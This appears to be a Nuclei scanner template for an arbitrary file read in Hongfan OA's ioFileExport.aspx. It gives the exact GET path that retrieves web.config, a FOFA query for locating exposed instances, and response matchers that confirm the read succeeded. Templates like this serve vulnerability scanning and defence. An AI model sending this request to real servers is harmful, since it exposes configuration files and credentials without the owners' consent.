id: hongfan-ioffice-lfi info: name: Hongfan OA ioFileExport.aspx - Arbitrary File Read author: SleepingBag945 severity: medium description: | Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%BA%A2%E5%B8%86OA/%E7%BA%A2%E5%B8%86OA%20ioFileExport.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - https://github.com/qingchenhh/qc_poc/blob/main/Goby/ioffice_file_read.go metadata: max-request: 1 fofa-query: app="红帆-ioffice" verified: true tags: hongfan,lfi variables: filename: "{{rand_base(5)}}" http: - method: GET path: - "{{BaseURL}}/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename={{filename}}.txt&ContentType=application/octet-stream" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "configSection") && contains(body, "iOfficeUpload")' - 'contains(header, "application/octet-stream")' condition: and